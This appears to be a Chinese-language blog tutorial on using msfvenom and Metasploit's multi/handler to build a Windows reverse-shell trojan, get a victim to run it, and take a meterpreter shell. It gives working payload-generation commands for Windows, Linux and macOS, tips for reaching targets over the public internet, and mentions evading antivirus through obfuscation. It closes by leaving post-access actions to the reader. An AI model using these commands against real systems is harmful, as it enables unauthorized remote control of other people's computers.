kali linux中的metasploit框架是優秀的滲透框架之一,今天記載一下使用kali生成windows遠控木馬的過程
生成payload使用的工具是MSFVenom,我們輸入msfvenom之后會顯示出它的基本參數
在這里我們沒有設置參數,所以第一行出現了一個錯誤
這里我們主要講windows下payloads的生成和利用,在第五行里面我們看到已經給出了一個生成payload的例子,這個例子生成的就是windwos下的木馬
即:
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
給出的例子里面沒有寫端口號,我們修改一點成為下面這個:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > ./Cl0ud.exe
LHOST就是你kali的ip地址,LPORT就是想要讓kali監聽用哪一個端口來監聽這個shell,然后將這個生成的exe文件輸出到當前目錄下Cl0ud.exe
我這里kali是內網地址:10.10.10.128,監聽端口是1234
我們先開啟metasploit框架,輸入msfconsole:
然后使用msfvenom生成Cl0ud.exe木馬:
現在我們到文件夾下能夠看到已經生成了Cl0ud.exe木馬
把它放在我主機windows10的桌面上
接着我們要使用到一個后門模塊,配置一個反彈會話處理程序,叫做exploit/multi/handler
use exploit/multi/handler 啟用:
我們設置監聽的端口和主機IP,注意這里設置的需要跟payload里面的設置成相同:
接着我們設置payload,即
set payload windows/meterpreter/reverse_tcp
現在kali上面也部署完畢了,我們輸入exploit,進行監聽
這時候kali在等待windows主機上有人點擊Cl0ud.exe,這樣就可以獲得shell
此時這里已經獲取了shell,我們輸入sysinfo查看系統信息,可知已經成功
獲取了權限之后剩下的就看你自己的操作了。
這里的環境是內網環境,如果想要kali生成的payload能夠在公網上進行使用,將kali的網絡改為橋接模式,跟主機使用不同的網卡就可以了,生成的木馬在公網上也有相同的效果了。
另外,如果在windows上面有殺毒軟件的話,可能會檢測出這是一個木馬文件而產生提示,我們還可以在生成的時候對Cl0ud.exe進行進一步的混淆和加密,繞過殺毒軟件的識別從而達到直接getshell的目的(混淆加密繞過下一次再寫吧,主要是懶)
然后還有在其他的一些環境下生成payload的命令,如下:
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho